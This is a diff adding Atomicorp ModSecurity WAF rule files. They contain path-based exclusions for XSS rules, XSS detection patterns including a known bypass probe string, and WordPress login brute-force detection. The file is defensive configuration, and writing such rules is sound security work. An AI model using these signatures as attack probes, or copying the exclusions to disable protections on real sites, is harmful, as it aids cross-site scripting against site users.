+SecRule REQUEST_FILENAME "/create-content/load-preview" "phase:2,id:95002,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/xmlrpc\.php" "phase:2,id:95003,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/services/bmcontent\.json" "phase:2,id:95004,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/moodle/lib/editor/atto/autosave-ajax\.php" "phase:2,id:95005,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/update-cms\.php" "phase:2,id:95006,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editor/filter_xss/" "phase:2,id:95007,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/site_config\.php" "phase:2,id:95008,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/panelediting\.php" "phase:2,id:95009,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sliderdesign\.php" "phase:2,id:95010,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/smb/file-manager/code-editor" "phase:2,id:95011,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/builder/" "phase:2,id:95012,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/index\.php/jtlconnector/" "phase:2,id:95013,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/v1/json/obmstore\.template\.save" "phase:2,id:95014,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/v1/json/obmstore" "phase:2,id:95015,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/services/bmwidget\.json" "phase:2,id:95016,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dataset\.xhtml" "phase:2,id:95017,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/amember/admin-setup/conversion-track" "phase:2,id:95018,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/lists/admin" "phase:2,id:95019,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/memberadmin/prefs_email\.php" "phase:2,id:95020,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/search\.php" "phase:2,id:95021,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341257"
+
+SecRule REQUEST_FILENAME "/pepadmin/" "phase:2,id:95022,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/pages/edit/editform" "phase:2,id:95023,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manage/_a_d_min_z_2014_2015" "phase:2,id:95024,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/comm/propal/card\.php" "phase:2,id:95025,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dolibarr/compta/" "phase:2,id:95026,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/admin_lecon_eds\.php" "phase:2,id:95027,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/api/statiqueweb/" "phase:2,id:95028,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/usermgmt\.php" "phase:2,id:95029,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/compta/facture/card\.php" "phase:2,id:95030,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/contenu/modif_contenu3\.asp" "phase:2,id:95031,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dodi/admin135/index\.php" "phase:2,id:95032,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-json/tss/v1/fields/1" "phase:2,id:95033,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/memberadmin/send_email_popup\.php" "phase:2,id:95034,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/signinresult\.php" "phase:2,id:95035,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin2/intake_edit\.php" "phase:2,id:95036,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/v2c/json/fr\.device\.preview" "phase:2,id:95037,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/json/fr\.template\.save" "phase:2,id:95038,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/json/en\.template\.save" "phase:2,id:95039,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/json/fr\.template\.convert" "phase:2,id:95040,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/json/en\.template\.convert" "phase:2,id:95041,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/json/fr\.image\.delete/" "phase:2,id:95042,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/json/fr\.image\.save/" "phase:2,id:95043,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/json/en\.image\.delete/" "phase:2,id:95044,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/json/en\.image\.save/" "phase:2,id:95045,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/smart/cgi-bin/ajaxmail" "phase:2,id:95046,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/admin\.php" "phase:2,id:95047,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/wp-json/wp/v2/posts/" "phase:2,id:95048,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/wysiwyg/save\.php" "phase:2,id:95049,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/admincp/user\.php" "phase:2,id:95050,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/admin/dogen_display\.php" "phase:2,id:95051,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/mail\.cgi" "phase:2,id:95052,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/editcontent\.php" "phase:2,id:95053,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/wp-admin/options\.php" "phase:2,id:95054,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/wp-admin/options-general\.php" "phase:2,id:95055,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/cerberus/parser\.php" "phase:2,id:95056,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/moduleinterface\.php" "phase:2,id:95057,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/admin\.mvc" "phase:2,id:95058,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/sqlpatch\.php" "phase:2,id:95059,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/install/index\.php" "phase:2,id:95060,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/tbl_create\.php" "phase:2,id:95061,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/view_create\.php" "phase:2,id:95062,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/tbl_select\.php" "phase:2,id:95063,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/tbl_addfield\.php" "phase:2,id:95064,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/tbl_change\.php" "phase:2,id:95065,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/alt_doc\.php" "phase:2,id:95066,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/product_modify\.php" "phase:2,id:95067,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/wp-admin/theme-editor\.php" "phase:2,id:95068,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/tbl_row_action\.php" "phase:2,id:95069,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/cgi-bin/database/admin\.pl" "phase:2,id:95070,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:95071,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/wp-admin/themes\.php" "phase:2,id:95072,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/admincp/css\.php" "phase:2,id:95073,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/administrator/" "phase:2,id:95074,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/still_edit\.php" "phase:2,id:95075,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.9.0 and up
+#
+# Created by Atomicorp, Inc. (http://www.atomicorp.com)
+# Copyright 2015-2023 by Atomicorp, Inc., all rights reserved.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+SecRule REQUEST_URI "< ?/? ?script" "phase:1,deny,status:403,t:none,t:utf8toUnicode,t:urlDecodeUni,t:compresswhitespace,t:lowercase,capture,id:341266,rev:23,severity:2,msg:'Atomicorp.com WAF Rules: Possible Cross Site Scripting',auditlog,log"
+
+SecRule REQUEST_METHOD "!(?:POST|GET)"   "phase:2,pass,t:none,rev:1,id:346949,nolog,noauditlog,skipAfter:END_DETECT_ADV_XSS"
+
+#Bypass for special cases
+SecRule REQUEST_URI "(?:/index\.php/(?:[a-z0-9_-]+/)+(?:rule_conditions_fieldset|newconditionhtml)|^/administrator/index\.php\?(?:option=com_(?:rsform|eshop)|format=html$)|^/index\.php/admin/easybanner_placeholder/save/|^/shop/admin/remote\.php\?remotesection=orders&w=editordersavebillingeddress|^/admin\.php\?(?:s=[a-z0-9]+&d=[a-z]+&c=content_|p=product_process)|^/?[a-z0-9\./]{0,}admin/[a-z0-9_]+/[0-9]+/(?:edit|add)|^/admin/config/media/colorbox|^/backoffice/index\.php\?controller=admintranslations|^/index\.php/admin/promo_quote/newactionhtml|^/[a-z_]+/index\.php\?s=[a-z0-9]+&d=cp&c=content_publish|^/wp-admin/network/admin\.php\?page=events-manager-options|^/file/ajax/|^/index\.php/treelogin/|^/([a-z]+/)?index\.php/admin/catalog_product|^(?:[a-z0-9_-]+/)+wp-comments-post\.php\?for=jetpack|^/[a-z0-9/]+admin/[a-z0-9/]+edit/|^/\?_task=mail|^/\?fl_builder|^/node(/[0-9]+)?/(?:edit|add)|^/\?_unlock=|^/smb/file-manager/code-editor/|^/node/[0-9]+/|^/[a-z0-9/]+?\?fl_builder|^/admin[_a-z0-9]+?/mgzpagebuilder/|^/index\.php\?route=extension/d_quickcheckout/custom/|^/[a-z0-9]+?/?admin[a-z0-9]+?/index\.php\?controller=admin|^/monsiteenbois/index\.php\?controller=admin)"   "phase:2,pass,t:none,t:lowercase,rev:8,id:346947,nolog,noauditlog,skipAfter:END_DETECT_ADV_XSS"
+
+SecRule ARGS|!ARGS:input_65|!ARGS:/com_liferay/|!ARGS:/refuse_code/|!ARGS:donotuse|!ARGS:/^jms/|!ARGS:/datasetForm/|!ARGS:/field_location/|!ARGS:rawtext|!ARGS:/fl_builder/|!ARGS:password|!ARGS:addthis|!ARGS:replymessage|!ARGS:/go_code/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:/sadrzaj/|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:eingabe|!ARGS:ausgabe|!ARGS:/previewdata/|!ARGS:/tracking_extra/|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/field_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:/^textarea-video/|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:/^texte$/|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:UserData|!ARGS:areas|!ARGS:templatecode|!ARGS:/prevObject/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:variable_data|!ARGS:/^instance/|!ARGS:/customfield/|!ARGS:notice|!ARGS:/formcode/|!ARGS:/ajax/|!ARGS:all|!ARGS:allowedTags|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/keycaptcha_code/|!ARGS:/jscode/|!ARGS:postcontents|!ARGS:/adsense/|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:tracking_code|!ARGS:whats-new|!ARGS:analyticscode|!ARGS:top_news|!ARGS:data[config]|!ARGS:fulltext|!ARGS:/introtext/|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS:/embed/|!ARGS:/desc/|!ARGS:/script/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:match_report|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:vgo_ee|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:/pagimenu/|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:text|!ARGS:/^addon/|!ARGS:txt|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/|!ARGS:params|!ARGS:/senior/|!ARGS:/rwx97/|!ARGS:/head_includes/|!ARGS:/signature/|!ARGS:message|!ARGS:vgo_ee "@detectXSS" "phase:2,deny,status:403,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:341256,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Possible Cross Site Scripting attack (detectXSS)',auditlog,log,logdata:'%{TX.0},%{matched_var_name}'"
+
+#virtual patches
+#deliverypostcode
+SecRule ARGS:deliverypostcode|ARGS:invoicepostcode|ARGS:postcode "@detectXSS"  "phase:2,deny,status:403,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:341267,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Possible Cross Site Scripting attack (detectXSS)',auditlog,log,logdata:'%{TX.0},%{matched_var_name}'"
+
+#Obvious malicious bypass techniques
+SecRule ARGS|REQUEST_URI "\'\"\"\'>><"  "phase:2,deny,status:403,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removewhitespace,capture,id:341259,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting attack',auditlog,log,logdata:'%{TX.0},%{matched_var_name}'"
+
+SecRule ARGS_NAMES "< ?(?:img src|base href) ?=" "phase:2,deny,status:403,t:none,t:utf8toUnicode,t:urlDecodeUni,t:compresswhitespace,t:lowercase,capture,id:341258,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Possible Cross Site Scripting attack (detectXSS) in Argument/Variable name',auditlog,log,logdata:'%{TX.0}'"
+
+#SecRule REQUEST_URI "^/\?s=" #  "phase:2,pass,t:none,t:lowercase,rev:9,id:346948,nolog,noauditlog,skipAfter:END_DETECT_ADV_XSS"
+#SecRule REQUEST_URI "@detectXSS" #"phase:2,deny,status:403,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:341257,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Possible Cross Site Scripting attack (detectXSS) in URL/URI',auditlog,log,logdata:'%{TX.0}'"
+
+
+SecMarker END_DETECT_ADV_XSS
diff --git a/nginx-waf/12_asl_brute.conf b/nginx-waf/12_asl_brute.conf
new file mode 100644
index 0000000..9a99c99
--- /dev/null
+++ b/nginx-waf/12_asl_brute.conf
@@ -0,0 +1,257 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.9+
+#
+# Created by Atomicorp (http://www.atomicorp.com)
+# Copyright 2005-2019 by Atomicorp, all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+#
+#SecRule REQUEST_METHOD "^post$" #phase:2,pass,t:none,t:lowercase,nolog,skip:1
+#SecAction phase:2,t:none,pass,nolog,skipAfter:END_BRUTE_IN
+
+#vbulletin
+#set a variable that someone tried to login
+#SecRule REQUEST_URI "/login\.php" # "pass,nolog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,setvar:tx.brute_vbulletin_login=yes,noauditlog,nolog,id:377400,rev:1,severity:2"
+#SecRule ARGS:do "^login$"
+
+
+#PHP logins
+#SecRule REQUEST_URI "/ucp\.php" # "chain,pass,nolog,noauditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,setvar:tx.brute_phpbb_login=yes"
+#SecRule ARGS:mode "^login$"
+
+#wikimedia
+#"POST /wiki/index.php?title=Special:UserLogin&action=submitlogin&type=login&returnto=Main_Page
+#SecRule ARGS:title "^special\:userlogin$"  # "chain,pass,nolog,noauditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,setvar:tx.brute_phpbb_login=yes"
+#SecRule ARGS:action "^submitlogin$" chain
+#SecRule ARGS:type "^login$"
+
+#SecMarker END_BRUTE_IN
+
+SecRule REQUEST_METHOD "@streq POST" "phase:5,chain,t:none,auditlog,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Wordpress Login Attempt Failure ',id:'377360',rev:2,severity:'4',tag:'no_ar'"
+SecRule REQUEST_URI "/wp-login\.php" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule RESPONSE_STATUS "200"  "t:none"
+
+SecRule REQUEST_URI "/wp-login\.php" "phase:2,chain,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,auditlog,deny,log,status:403,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Wordpress Login with no user-agent or referrer, Bot attempting Wordpress Login',id:'377390',rev:3,severity:'2'"
+SecRule &REQUEST_HEADERS:Referer "@eq 0" "t:none,chain"
+SecRule &REQUEST_HEADERS:User-Agent "@eq 0" "t:none"
+
+SecRule REQUEST_URI "/wp-login\.php" "phase:2,chain,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,auditlog,deny,log,status:403,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Wordpress Login with empty user-agent and referrer, possible bot',id:'377391',rev:4,severity:'2'"
+SecRule REQUEST_HEADERS:User-Agent "^$" "t:none,t:removeWhiteSpace,chain"
+SecRule REQUEST_HEADERS:Referer "^$" "t:none,t:removeWhiteSpace"
+
+#multi-auth blocking for wordpress xmlrpc
+#wp.getUsersBlogs
+SecRule REQUEST_URI "/xmlrpc\.php" "t:none,t:urlDecodeUni,t:lowercase,phase:2,id:345868,pass,nolog,noauditlog,chain,skip:1"
+SecRule REQUEST_METHOD "@streq POST" "t:none"
+SecAction "phase:2,id:323318,t:none,pass,nolog,noauditlog,skipAfter:END_XMLRPC_BRUTE_1"
+
+
